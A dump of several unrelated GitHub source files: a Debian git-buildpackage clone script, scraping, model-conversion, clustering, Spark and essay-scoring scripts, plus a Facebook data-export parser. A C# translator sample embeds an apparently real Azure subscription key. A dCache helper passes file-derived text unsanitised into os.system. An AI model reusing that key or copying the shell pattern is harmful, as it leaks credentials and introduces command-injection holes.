ceb44990c0a03a8da3f35c8d296e7207923be049
|
f78de4f006dbf5fea3d6ae4b50901fb003644c6e
|
refs/heads/master
| 2021-01-18T00:20:50.558188
| 2016-11-25T10:20:50
| 2016-11-25T10:25:24
| 55,617,648
| 0
| 0
| null | 2016-04-06T15:26:58
| 2016-04-06T15:26:57
| null |
UTF-8
|
Python
| false
| false
| 6,022
|
py
|
# vim: set fileencoding=utf-8 :
#
# (C) 2009, 2010, 2015 Guido Guenther <agx@sigxcpu.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, please see
# <http://www.gnu.org/licenses/>
#
# inspired by dom-git-checkout
#
"""Clone a Git repository and set it up for gbp"""
import sys
import os
from gbp.config import (GbpOptionParser, GbpOptionGroup)
from gbp.deb.git import DebianGitRepository
from gbp.git import (GitRepository, GitRepositoryError)
from gbp.errors import GbpError
from gbp.scripts.common import ExitCodes
from gbp.scripts.common.hook import Hook
import gbp.log
def build_parser(name):
try:
parser = GbpOptionParser(command=os.path.basename(name), prefix='',
usage='%prog [options] repository - clone a remote repository')
except GbpError as err:
gbp.log.err(err)
return None
branch_group = GbpOptionGroup(parser, "branch options", "branch tracking and layout options")
cmd_group = GbpOptionGroup(parser, "external command options", "how and when to invoke hooks")
parser.add_option_group(branch_group)
parser.add_option_group(cmd_group)
branch_group.add_option("--all", action="store_true", dest="all", default=False,
help="track all branches, not only debian and upstream")
branch_group.add_config_file_option(option_name="upstream-branch", dest="upstream_branch")
branch_group.add_config_file_option(option_name="debian-branch", dest="debian_branch")
branch_group.add_boolean_config_file_option(option_name="pristine-tar", dest="pristine_tar")
branch_group.add_option("--depth", action="store", dest="depth", default=0,
help="git history depth (for creating shallow clones)")
branch_group.add_option("--reference", action="store", dest="reference", default=None,
help="git reference repository (use local copies where possible)")
cmd_group.add_config_file_option(option_name="postclone", dest="postclone",
help="hook to run after cloning the source tree, "
"default is '%(postclone)s'")
cmd_group.add_boolean_config_file_option(option_name="hooks", dest="hooks")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False,
help="verbose command execution")
parser.add_config_file_option(option_name="color", dest="color", type='tristate')
parser.add_config_file_option(option_name="color-scheme",
dest="color_scheme")
return parser
def parse_args(argv):
parser = build_parser(argv[0])
if not parser:
return None, None
(options, args) = parser.parse_args(argv)
gbp.log.setup(options.color, options.verbose, options.color_scheme)
return (options, args)
def main(argv):
retval = 0
(options, args) = parse_args(argv)
if not options:
return ExitCodes.parse_error
if len(args) < 2:
gbp.log.err("Need a repository to clone.")
return 1
else:
source = args[1]
clone_to, auto_name = (os.path.curdir, True) if len(args) < 3 else (args[2], False)
try:
GitRepository(clone_to)
gbp.log.err("Can't run inside a git repository.")
return 1
except GitRepositoryError:
pass
try:
gbp.log.info("Cloning from '%s'%s" % (source, " into '%s'" % clone_to if not auto_name else ''))
repo = DebianGitRepository.clone(clone_to, source, options.depth,
auto_name=auto_name, reference=options.reference)
os.chdir(repo.path)
# Reparse the config files of the cloned repository so we pick up the
# branch information from there but don't overwrite hooks:
postclone = options.postclone
(options, args) = parse_args(argv)
# Track all branches:
if options.all:
remotes = repo.get_remote_branches()
for remote in remotes:
local = remote.replace("origin/", "", 1)
if (not repo.has_branch(local) and
local != "HEAD"):
repo.create_branch(local, remote)
else: # only track gbp's default branches
branches = [options.debian_branch, options.upstream_branch]
if options.pristine_tar:
branches += [repo.pristine_tar_branch]
gbp.log.debug('Will track branches: %s' % branches)
for branch in branches:
remote = 'origin/%s' % branch
if (repo.has_branch(remote, remote=True) and
not repo.has_branch(branch)):
repo.create_branch(branch, remote)
repo.set_branch(options.debian_branch)
if postclone:
Hook('Postclone', options.postclone,
extra_env={'GBP_GIT_DIR': repo.git_dir},
)()
except KeyboardInterrupt:
retval = 1
gbp.log.err("Interrupted. Aborting.")
except GitRepositoryError as err:
gbp.log.err("Git command failed: %s" % err)
retval = 1
except GbpError as err:
if str(err):
gbp.log.err(err)
retval = 1
return retval
if __name__ == '__main__':
sys.exit(main(sys.argv))
# vim:et:ts=4:sw=4:et:sts=4:ai:set list listchars=tab\:»·,trail\:·:
|
[
"agx@sigxcpu.org"
] |
agx@sigxcpu.org
|
e7528b53bf59accca0a8edb3e80b97d34f68dd60
|
b47c9f284c80061fc094568fc095f6daf0cd7d89
|
/soukuanshop/soukuanshop/main.py
|
5213b306e19ae97badfe9f9b24b2c5dc58741ba1
|
[] |
no_license
|
wjsunday/scrapy_test
|
2361c0584ea546cfec0a9d9854fad1c209f8d6b2
|
980e2f8b898de2f76e5cc1754b66a0be90b1b738
|
refs/heads/master
| 2022-11-14T05:43:16.821153
| 2019-03-22T06:38:01
| 2019-03-22T06:38:01
| 170,845,836
| 0
| 1
| null | 2022-11-04T19:26:43
| 2019-02-15T10:20:16
|
Python
|
UTF-8
|
Python
| false
| false
| 86
|
py
|
from scrapy import cmdline
cmdline.execute('scrapy crawl soukuanshop_spider'.split())
|
[
"wangalways@163.com"
] |
wangalways@163.com
|
f98677b8c19e4cc92135f5d82ed7910c4ceaacf0
|
942c67f11656d0da648c7156e7dbe37e9216a723
|
/tools/convert_uff.py
|
0b0dfa741c9af75c6e54c7673e5c783c99b5c47c
|
[
"MIT"
] |
permissive
|
ikonushok/recface
|
62eec353d3eded97fa7748d3f45f1964f0f673bc
|
bada63e1b92783cde1d99501e76a78eb363b225f
|
refs/heads/main
| 2023-08-18T07:02:31.468952
| 2021-09-15T08:06:08
| 2021-09-15T08:06:08
| 460,003,377
| 0
| 1
|
MIT
| 2022-02-16T12:53:36
| 2022-02-16T12:53:36
| null |
UTF-8
|
Python
| false
| false
| 1,100
|
py
|
#!/usr/bin/env python
import sys
import logging
import argparse
logging.disable(logging.WARNING)
# The "uff 0.6.9" module works only with "tensorflow 1.15.0"
UFF_DIR = '/usr/lib/python3.6/dist-packages'
sys.path.append(UFF_DIR)
import uff
logging.disable(logging.NOTSET)
def create_parser():
parser = argparse.ArgumentParser(
description=('Converts a Tensorflow frozen graph model '
'into a TensorRT UFF format'))
parser.add_argument('frz_path', type=str,
help='specify the frozen model path')
parser.add_argument('uff_path', type=str,
help='specify the UFF model path')
return parser
def convert(frz_path, uff_path):
uff.from_tensorflow_frozen_model(
frozen_file=frz_path, output_nodes=["Identity"],
output_filename=uff_path, debug_mode=False)
def main():
parser = create_parser()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
convert(args.frz_path, args.uff_path)
if __name__ == '__main__':
main()
|
[
"rustequal@gmail.com"
] |
rustequal@gmail.com
|
4c549606cc28efd9624f18138428cae291966aaf
|
0d235d1a01f623fc0e0f3a1c634eb38659a0609e
|
/files/check_restore_processes.py
|
1c7aa5af828cbe114b6ebedf5dcd64571a0b8fd0
|
[] |
no_license
|
dCache/dcache-puppet
|
4d3d53539c5adf335bdc19333fccae2770fe8417
|
40fd1bb8298fcfce7593dd02440351a4bb0767d1
|
refs/heads/master
| 2021-01-01T05:46:41.046127
| 2019-06-17T13:55:18
| 2019-06-17T13:55:18
| 41,730,779
| 0
| 2
| null | 2017-09-20T15:08:40
| 2015-09-01T09:54:36
|
Perl
|
UTF-8
|
Python
| false
| false
| 1,721
|
py
|
#!/usr/bin/python
# FILE: /opt/endit/check_restore_processes.py
#
# DESCRIPTION:
#
# VERSION: 06.12.2013
#
# AUTOR: Cristina Manzano
# Juelich Supercomputing Centre (JSC)
# Forschungszentrum Juelich GmbH
# 52425 Juelich, Germany
#
# Phone: +49 2461 61 1958
# E-mail: c.manzano@fz-juelich.de
#
# TO DO:
# -
import os
import logging
# set up logging to file - see previous section for more details
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)-6s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
filename='/tmp/checking.log',
filemode='a')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(asctime)s %(levelname)-6s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
def check_process(pnfsid):
outfile = "/tmp/checking.out"
request = "ps -ef |grep "+pnfsid
logging.info(request)
#os.system("rm -f "+outfile)
os.system(request+" 2>&1 > "+outfile)
input_f = open(outfile, "r")
logging.info(input_f.read())
input_f.close()
return
#MAIN
#input_f = open("/var/log/dcache/files_dC12_CACHED","r")
input_f = open("/var/log/dcache/files_to_delete.24.03.2014","r")
for line in input_f:
words = line.split("\n")
pnfsid = words[0]
check_process(pnfsid)
input_f.close()
|
[
"o.tsigenov@fz-juelich.de"
] |
o.tsigenov@fz-juelich.de
|
e8a6c4a603dd1cbd2f2a7b1cfd2e38ae89096891
|
9ac7f65867bf8654db45c346bdaf67d2bda8580e
|
/Clustering/clustering.py
|
69073c129c7bccddbf017112eb5dfd99774ca17a
|
[] |
no_license
|
rashmi59/AMLCornell
|
ad9e3df1cbdaf4cfc2ed88fca1c6234213504242
|
dcb7782a0fb1877c7782b2267dab276b16d8a77c
|
refs/heads/master
| 2023-02-01T05:03:27.075153
| 2020-12-20T04:31:11
| 2020-12-20T04:31:11
| 302,675,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,779
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 1 22:08:17 2020
@author: rashmisinha
"""
import numpy as np
from functools import cmp_to_key
from matplotlib import pylab as plt
import random
doc_word = np.load("science2k-doc-word.npy")
text_file = open("science2k-titles.txt", "r")
titles = text_file.read().split('\n')
word_doc = np.load("science2k-word-doc.npy")
vocab_file = open("science2k-vocab.txt", "r")
words = vocab_file.read().split('\n')
class K_Means:
def __init__(self, k=2, tol=0.001, max_iter=300):
self.k = k
self.tol = tol
self.max_iter = max_iter
# Function to compute k means by assigning centroids,
#computing disatance and reassigning centroids
def fit(self,data):
self.centroids = {}
randlist = random.sample(range(data.shape[0]), self.k)
for i in range(self.k):
self.centroids[i] = data[randlist[i]]
for i in range(self.max_iter):
self.classifications = {}
for i in range(self.k):
self.classifications[i] = []
for featureset in data:
distances = [np.linalg.norm(featureset-self.centroids[centroid]) for centroid in self.centroids]
classification = distances.index(min(distances))
self.classifications[classification].append(featureset)
prev_centroids = dict(self.centroids)
for classification in self.classifications:
self.centroids[classification] = np.average(self.classifications[classification],axis=0)
optimized = True
for c in self.centroids:
original_centroid = prev_centroids[c]
current_centroid = self.centroids[c]
if np.sum((current_centroid-original_centroid)/original_centroid*100.0) > self.tol:
#print(np.sum((current_centroid-original_centroid)/original_centroid*100.0))
optimized = False
if optimized:
break
# Function to compute error for elbow curve
def geterror(centroid, classification):
error = 0;
for i in range(0, len(classification)):
for j in range(0, len(classification[i])):
error += (centroid[j] - classification[i][j]) * (centroid[j] - classification[i][j])
return error
# Custom compare to sort according to closeness to a point
def cmp(a, b):
suma = 0
for i in range(0, len(a)):
suma += (centr[i] - a[i]) * (centr[i] - a[i])
sumb = 0
for i in range(0, len(b)):
sumb += (centr[i] - b[i]) * (centr[i] - b[i])
if suma < sumb:
return 1
else:
return -1
# Running k means for doc word dataset
finans = {}
errorlist = []
for num in range(1, 21):
clf = K_Means(k = num, max_iter = 1000)
clf.fit(doc_word)
classifications = clf.classifications
centroids = clf.centroids
global centr
doc_word_list = doc_word.tolist()
ans = {}
error = 0
for i in centroids:
error += geterror(centroids[i], classifications[i])
points = classifications[i]
cmp_key = cmp_to_key(cmp)
centr = centroids[i]
points.sort(key=cmp_key)
ans[i] = []
for j in range(0, min(10, len(points))):
for p in range(0, len(doc_word_list)):
if doc_word_list[p] == points[j].tolist():
ans[i].append(titles[p])
break
errorlist.append(error)
finans[num] = ans
plt.figure(0)
plt.plot(list(range(1, 21)), errorlist)
plt.ylabel('error')
plt.xlabel('k values')
plt.title('Error versus k values')
#Running k means for word-doc dataset
finans = {}
errorlist = []
for num in range(1, 21):
clf = K_Means(k = num, max_iter = 1000)
clf.fit(word_doc)
classifications = clf.classifications
centroids = clf.centroids
word_doc_list = word_doc.tolist()
ans = {}
error = 0
for i in centroids:
error += geterror(centroids[i], classifications[i])
points = classifications[i]
cmp_key = cmp_to_key(cmp)
centr = centroids[i]
points.sort(key=cmp_key)
ans[i] = []
for j in range(0, min(10, len(points))):
for p in range(0, len(word_doc_list)):
if doc_word_list[p] == points[j].tolist():
ans[i].append(titles[p])
break
errorlist.append(error)
finans[num] = ans
plt.figure(0)
plt.plot(list(range(1, 21)), errorlist)
plt.ylabel('error')
plt.xlabel('k values')
plt.title('Error versus k values')
|
[
"rashmi.s5991@gmail.com"
] |
rashmi.s5991@gmail.com
|
426a44d8dad21cdb891f06f7a97122c8ba62a0b6
|
2bdedcda705f6dcf45a1e9a090377f892bcb58bb
|
/src/main/output/test/aws_people_netflix_job.py
|
2b7ca0507043c6c957363b451686f46eed298080
|
[] |
no_license
|
matkosoric/GenericNameTesting
|
860a22af1098dda9ea9e24a1fc681bb728aa2d69
|
03f4a38229c28bc6d83258e5a84fce4b189d5f00
|
refs/heads/master
| 2021-01-08T22:35:20.022350
| 2020-02-21T11:28:21
| 2020-02-21T11:28:21
| 242,123,053
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
using System;
using System.Net;
using System.Net.Http;
using System.Threading.Tasks;
using Microsoft.Translator.API;
namespace CSharp_TranslateSample
{
class Program
{
private const string SubscriptionKey = "02fc72d7132657bc795325f80933e657"; //Enter here the Key from your Microsoft Translator Text subscription on http://portal.azure.com
static void Main(string[] args)
{
TranslateAsync().Wait();
Console.ReadKey();
}
/// Demonstrates getting an access token and using the token to translate.
private static async Task TranslateAsync()
{
var translatorService = new TranslatorService.LanguageServiceClient();
var authTokenSource = new AzureAuthToken(SubscriptionKey);
var token = string.Empty;
try
{
token = await authTokenSource.GetAccessTokenAsync();
}
catch (HttpRequestException)
{
switch (authTokenSource.RequestStatusCode)
{
case HttpStatusCode.Unauthorized:
Console.WriteLine("Request to token service is not authorized (401). Check that the Azure subscription key is valid.");
break;
case HttpStatusCode.Forbidden:
Console.WriteLine("Request to token service is not authorized (403). For accounts in the free-tier, check that the account quota is not exceeded.");
break;
}
throw;
}
Console.WriteLine("Translated to French: {0}", translatorService.Translate(token, "Hello World", "en", "fr", "text/plain", "general", string.Empty));
}
}
}
|
[
"soric.matko@gmail.com"
] |
soric.matko@gmail.com
|
bbd421d3102721960d65d39daf5a187b6a76d6a5
|
cfce1431185099032e3d2399cf6ee1d5fc3d153a
|
/pyspark10.py
|
91e60ba06eaed2c14e932605a30981a74d3492a5
|
[] |
no_license
|
mohanvatrapuhub/Spark-Code
|
6315ce7d34c3033d698c809c6d42e482bae576fd
|
a8a1f652f1a33ba40ab38e7d508a960a698f9fe9
|
refs/heads/master
| 2021-01-11T16:23:29.488261
| 2017-01-26T00:57:37
| 2017-01-26T00:57:37
| 80,069,938
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,132
|
py
|
#Finding the average revenue per day using aggregate functions in spark using pyspark
ordersRDD = sc.textFile("/user/cloudera/import/orders")
orderItemsRDD = sc.textFile("/user/cloudera/import/order_items")
ordersParsedRDD = ordersRDD.map(lambda rec: (rec.split(",")[0], rec))
orderItemsParsedRDD = orderItemsRDD.map(lambda rec: (rec.split(",")[1], rec))
ordersJoinOrderItems = orderItemsParsedRDD.join(ordersParsedRDD)
ordersJoinOrderItemsMap = ordersJoinOrderItems.map(lambda t: ((t[1][1].split(",")[1], t[0]), float(t[1][0].split(",")[4])))
revenuePerDayPerOrder = ordersJoinOrderItemsMap.reduceByKey(lambda acc, value: acc + value)
revenuePerDayPerOrderMap = revenuePerDayPerOrder.map(lambda rec: (rec[0][0], rec[1]))
#Performing aggregation by using combineByKey aggregate function
revenuePerDay = revenuePerDayPerOrderMap.combineByKey( \
lambda x: (x, 1), \
lambda acc, revenue: (acc[0] + revenue, acc[1] + 1), \
lambda total1, total2: (round(total1[0] + total2[0], 2), total1[1] + total2[1]) \
)
for data in revenuePerDay.collect():
print(data)
avgRevenuePerDay = revenuePerDay.map(lambda x: (x[0], x[1][0]/x[1][1]))
|
[
"mohanchaitanya2593@gmail.com"
] |
mohanchaitanya2593@gmail.com
|
e21efb1a670fd9d11859661c10a6e5043a968dad
|
e5f61b78618dcbd25f6789a6f9c2246c9e1fa74a
|
/day_3/todo_list/.todo-list/bin/dotenv
|
4660b0da286e3828f00d3e44eefc7eb8ced6680a
|
[] |
no_license
|
stephenh369/python_course
|
14674a77d543d86babb767089be6c6bed04e75f6
|
39297e3e52e31fb265ff614a368307847f18f653
|
refs/heads/master
| 2023-01-01T07:20:10.505888
| 2020-10-16T09:29:23
| 2020-10-16T09:29:23
| 304,581,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
#!/Users/user/e41/codeclan_work/python_extra_course/day_3/todo_list/.todo-list/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from dotenv.cli import cli
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(cli())
|
[
"stephen_h369@live.co.uk"
] |
stephen_h369@live.co.uk
|
|
f5c1516db24cb09cf7068e17be9a3f99b012f220
|
7644d98d292eb9260d295b3298a6110998c7e239
|
/fb_scrap.py
|
0b0f50a4da519b3141810b70b6be5e9998b237ac
|
[] |
no_license
|
SarthakM7/facebookScraper-self-
|
17c6329bff4b9dac9e9c345911f92a82a265795a
|
c7ae0929a9e83c837e56ca63215e0c71be204b86
|
refs/heads/main
| 2023-04-20T16:22:54.069325
| 2021-05-07T23:49:04
| 2021-05-07T23:49:04
| 365,377,931
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,570
|
py
|
import codecs, os, re
from bs4 import BeautifulSoup
def parse_videos():
"""
Prints the total number of video files inside the /photos_and_videos/videos folder
uploaded directly to Facebook.
"""
videos_dir = '{}/photos_and_videos/videos'.format(fb_dir)
if not os.path.exists(videos_dir):
return
_, __, filenames = next(os.walk(videos_dir))
print('Number of Videos: {}'.format(len(filenames)))
def parse_photos():
"""
Traverses the contents of the /photos_and_videos folder.
Prints the total number of photos/comments, as well as your average
comments per photo and the top 10 most frequent commenters.
The actual photos are separated by album and have their own folders.
There is an HTML file for each album in the /photos_and_videos/album
folder with metadata and the comments.
"""
photos_and_videos_dir = '{}/photos_and_videos'.format(fb_dir)
if not os.path.exists(photos_and_videos_dir):
return
album_dir = photos_and_videos_dir + '/album'
stickers_dir = photos_and_videos_dir + '/stickers_used'
videos_dir = photos_and_videos_dir + '/videos'
photo_count = 0
photo_albums = []
comment_counts = {}
for i, (dirpath, dirnames, filenames) in enumerate(os.walk(photos_and_videos_dir)):
if dirpath == album_dir:
# Retrieve album filenames
photo_albums = filenames
elif i != 0 and dirpath != stickers_dir and dirpath != videos_dir:
# Skip the first iteration to ignore the html files in the
# root photos_and_videos file, along with any stickers in
# /stickers_used and videos in /videos
photo_count += len(filenames)
for filename in photo_albums:
filepath = album_dir + '/{}'.format(filename)
comment_counts = parse_photo_album(filepath, comment_counts)
total_comment_count = len(comment_counts)
average_comments_per_photo = total_comment_count / float(photo_count)
print('Number of Photos: {}'.format(photo_count))
print('Number of Comments: {}'.format(total_comment_count))
print('Average Comments Per Photo: {}'.format(average_comments_per_photo))
print('Top 10 Commenters:')
print_dict(comment_counts, end_index=10)
def parse_photo_album(filepath, comment_counts):
"""
Traverses the contents of a specific photo album HTML file.
Example comment format:
<div class="comment">
<span class="user">Probably My Mom</span>Love this photo!
<div class="meta">Wednesday, May 17, 2017 at 7:08am UTC+10</div>
</div>
"""
f = codecs.open(filepath, 'r', 'utf-8')
soup = BeautifulSoup(f.read(), 'lxml')
for comment in soup.findAll('div', {'class': 'uiBoxGray'}):
user = comment.findAll('span')[0].text
try:
user = str(user)
comment_counts = increment_dict(comment_counts, user)
except:
# There was a unicode error with the user name
continue
return comment_counts
def parse_friends_list():
"""
Traverses the contents of the friends HTML file.
"""
f = codecs.open('{}/friends/friends.html'.format(fb_dir), 'r', 'utf-8')
soup = BeautifulSoup(f.read(), 'lxml')
friend_map = {}
friends_list = soup.findAll('div', {'class': 'uiBoxWhite'})
for friend in friends_list:
year = get_year(friend.text)
friend_map = increment_dict(friend_map, year)
print('Friends Added By Year:')
print_dict(friend_map)
def parse_timeline():
"""
Traverses the contents of the comments HTML file.
Example comment format:
<div class="pam _3-95 _2pi0 _2lej uiBoxWhite noborder">
<div class="_3-96 _2pio _2lek _2lel">[Your name] commented on [another user's name] 's [post, comment, song, video, or link]</div>
<div class="_3-96 _2let">
<div>
<div class="_2pin">
<div>[Your comment]</div>
</div>
</div>
</div>
<div class="_3-94 _2lem">
<a href=[Live URL]>Jan 16, 2019, 10:15 AM</a>
</div>
</div>
"""
try:
f = codecs.open('{}/posts/your_posts.html'.format(fb_dir), 'r', 'utf-8')
posts_soup = BeautifulSoup(f.read(), 'lxml')
posts_data = posts_soup.findAll('div', {'class': 'uiBoxWhite'})
except:
posts_soup=[]
posts_data=[]
print('not found')
f = codecs.open('{}/comments/comments.html'.format(fb_dir), 'r', 'utf-8')
comments_soup = BeautifulSoup(f.read(), 'lxml')
comments_data = comments_soup.findAll('div', {'class': 'uiBoxWhite'})
posts = 0
songs = 0
videos = 0
comments = 0
for post in posts_data:
for url in ['https://open.spotify.com/track/', 'https://soundcloud.com/']:
if url in post.text:
songs += 1
for url in ['https://www.youtube.com/', 'https://vimeo.com/']:
if url in post.text:
videos += 1
posts += 1
for comment in comments_data:
comments += 1
metadata_map = {}
for metadata in comments_data:
year = get_year(metadata.text)
metadata_map = increment_dict(metadata_map, year)
for metadata in posts_data:
year = get_year(metadata.text)
metadata_map = increment_dict(metadata_map, year)
print('Number of Posts: {}'.format(posts))
print('Number of Comments: {}'.format(comments))
print('Songs Shared: {}'.format(songs))
print('Videos Shared: {}'.format(videos))
print('Timeline Activity By Year:')
print_dict(metadata_map)
def print_dict(dictionary, sort_index=1, end_index=100000):
"""
Iterate over the dictionary items and print them as a key, value list.
"""
sorted_dict = sorted(dictionary.items(),
key=lambda x: x[sort_index],
reverse=True)
for k, v in sorted_dict[:end_index]:
print(' - {}: {}'.format(k, v))
def increment_dict(dictionary, key):
"""
Given a dict of str keys, increment the int count value.
"""
if key in dictionary:
dictionary[key] += 1
else:
dictionary[key] = 1
return dictionary
def get_year(text):
"""
Given some text, parse out the year.
Example formats:
- May 19, 2007
- Jan 7, 2011, 4:25 PM
"""
match = re.findall(r', [0-9]{4}', text)
return match[0][2:]
fb_dir = find_fb_dir()
parse_videos()
parse_photos()
parse_friends_list()
parse_timeline()
|
[
"noreply@github.com"
] |
SarthakM7.noreply@github.com
|
b7504f8d6a04c2aea9e6087d3e6e0aa4de3ec1d1
|
c4a67e16f9aa1828aa53780f7ad1cb60033dabe3
|
/main.py
|
26f99e9d7f20cbc9bfcbf8635041f2e3fa3fcbc0
|
[
"MIT"
] |
permissive
|
t4t5u0/NarouBookmarkGetter
|
a34af8c28e64bc2e943019b90f0897455f93d6b9
|
08267adff137890cd4796a3f4022c3100c39f991
|
refs/heads/master
| 2023-07-27T17:28:54.109803
| 2021-09-07T20:38:47
| 2021-09-07T20:38:47
| 318,339,949
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,951
|
py
|
import json
import time
from collections import UserDict
from configparser import ConfigParser
import requests
from bs4 import BeautifulSoup
login = 'https://ssl.syosetu.com/login/login/'
top = "https://syosetu.com/"
bookmark = "https://syosetu.com/favnovelmain/list/"
query = "https://syosetu.com/favnovelmain/list/index.php"
config = ConfigParser()
config.read('config.ini')
payload = {"narouid": config['DEFAULT']
['narouid'], "pass": config['DEFAULT']['pass']}
# print(payload)
ua = "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Mobile Safari/537.36"
headers = {"User-Agent": ua}
class SyosetsuInfoDict(UserDict):
"data: これが本体"
def __init__(self, __ncode: str, __title: str, __total) -> None:
super().__init__(ncode=__ncode, title=__title, total=__total)
def get_all_bookmark():
"全てのブックマークを取得する処理"
ncodes = []
titles = []
totals = []
ses = requests.Session()
a = ses.post(login, data=payload, headers=headers)
try:
cookies = [dict(hoge.cookies) for hoge in a.history][0]
except IndexError as e:
print(e)
print('narouid と pass を確認してください')
exit(0)
for i in range(1, 11):
tmp = []
# なんとなく待ってみる
time.sleep(1)
for j in range(1, 9):
param = {"nowcategory": str(i), "order": "new", "p": str(j)}
page = ses.get(query, headers=headers,
params=param, cookies=cookies)
# ステータスコードが200じゃなかったら処理しない
if page.status_code != 200:
continue
# title: a class=title text -> list[str]
# ncode: a class=title href をとってくる -> list[str]
# total: ncodeで検索 -> t := a href[-1] -> t[2:-2]
soup = BeautifulSoup(page.text, 'lxml')
contents = soup.find_all('a', class_='title')
query_with_story = [l.get('href') for l in soup.select('p.no > a')]
# 1回前と重複してたら処理をしない
if contents == tmp:
continue
tmp = "https://syosetu.com/favnovelmain/list/index.php"
titles += [content.text.replace('\u3000', ' ')
for content in contents]
ncodes += [content.get('href')[26:-2] for content in contents]
totals += [l.split('/')[-2] for l in query_with_story]
return sorted([SyosetsuInfoDict(ncode, title, total).data
for ncode, title, total
in zip(ncodes, titles, totals)],
key=lambda x: x['ncode'])
if __name__ == "__main__":
result = get_all_bookmark()
with open(f'./data/{time.time()}.json', 'a+') as f:
json.dump(result, f, ensure_ascii=False, indent=4)
|
[
"ymmtryk0902@gmail.com"
] |
ymmtryk0902@gmail.com
|
f78a7ddcb5380ac08fb04a0a48d03d31cc027626
|
7d4c778e2ba6d8272baec99705e5691036e778c0
|
/EE-without-Grammar.py
|
2402e204645a1d3f465501ce690be05e420ddfd8
|
[] |
no_license
|
Ganz7/Reggo-Evaluator
|
b34dae7a81ccbd89a68369007a87bbc3dd8be085
|
5412b917d0488ae6183241c3e89a1ca370680906
|
refs/heads/master
| 2021-01-20T11:31:07.254296
| 2014-03-06T13:24:52
| 2014-03-06T13:24:52
| 17,478,272
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,118
|
py
|
'''
Program: Essay Evaluator
'''
import csv
import numpy as np
import matplotlib.pyplot as plt
from nltk import wordpunct_tokenize
from nltk.tag import pos_tag
import re
import enchant
from LSA.LSAClass import LSA
'''For Grammar Checker'''
#Start
#from py4j.java_gateway import JavaGateway
#gateway = JavaGateway()
#grammarCheckerApp = gateway.entry_point
#End
print "\'ESSAY EVALUATOR\'\n\n"
'''LSA Initialization'''
stopwords = ['a','an','the','to','for','in','on','up','down','at','before','after','above','below','under','over','what','when','who','how','why','which','where','if','so','but','and','otherwise','however','hence','therefore','that','he','she','it','they','each','every','all','you','I','we','him','her','us','my','mine','is','was','were','are','am','will','shall','may','might','can','could','should','would','do','did','does','done','has','have','had','again']
ignorechars = ''',:'!'''
print "\nInitializing LSA Procedure..."
lsaObj = LSA(stopwords, ignorechars)
print "Building Word By Document Matrix..."
lsaObj.build()
#lsaObj.printA()
print "\nBuilding LSA Model..."
lsaObj.calc()
print "\nLSA Model Ready"
lsaObj.printSVD()
def returnPOSTaggedWords(text):
output={"CC":0,"CD":0,"DT":0,"EX":0,"FW":0,"IN":0,"JJ":0,"JJR":0,"JJS":0,"LS":0,"MD":0,"NN":0,"NNP":0,"NNPS":0,"NNS":0,"PDT":0,"POS":0,"PRP":0,"PRP$":0,"RB":0,"RBR":0,"RBS":0,"RP":0,"SYM":0,"TO":0,"UH":0,"VB":0,"VBD":0,"VBG":0,"VBN":0,"VBP":0,"VBZ":0,"WDT":0,"WP":0,"WP$":0,"WRB":0,"#":0,"$":0,"''":0,"(":0,")":0,",":0,".":0,":":0,"''":0,"-NONE-":0,"``":0}
tokens=wordpunct_tokenize(text)
tagged=pos_tag(tokens)
for word,pos in tagged:
output[pos]=output[pos]+1
return output
def returnNounCount(TaggedWords):
return (TaggedWords["NN"]+TaggedWords["NNP"]+TaggedWords["NNPS"]+TaggedWords["NNS"])
def returnVerbCount(TaggedWords):
return (TaggedWords["VB"]+TaggedWords["VBD"]+TaggedWords["VBG"]+TaggedWords["VBN"]+TaggedWords["VBP"]+TaggedWords["VBZ"])
def returnAdjectiveCount(TaggedWords):
return (TaggedWords["JJ"]+TaggedWords["JJS"]+TaggedWords["JJR"])
def returnAdverbCount(TaggedWords):
return (TaggedWords["RB"]+TaggedWords["RBR"]+TaggedWords["RBS"])
def returnWordCount(essay):
return len(re.split(r'[^0-9A-Za-z]+',essay))
def returnSentenceCount(essay):
return len(re.split(r'[.!?]+', essay))
def returnCommaCount(essay):
return essay.count(',')
"""
def returnSpellingScore(text):
ignorechars = ''',:.;'?!'''
dictionary=enchant.Dict("en_US")
words = re.findall(r"(?i)\b[a-z]+\b", text)
totalno=0.0
score=0.0
for w in words:
w = w.translate(None, ignorechars)
if dictionary.check(w)==True:
score=score+1;
totalno=totalno+1
percentage=score/totalno;
return percentage * 10
def returnGrammarScore(essay):
return grammarCheckerApp.returnScore(essay)
"""
def evaluateEssay(essay,coeff):
m1=coeff[0]
m2=coeff[1]
m3=coeff[2]
m4=coeff[3]
m5=coeff[4]
m6=coeff[5]
m7=coeff[6]
m8=coeff[7]
#m9=coeff[8]
#wGrammarScore = coeff[9]
c=coeff[8]
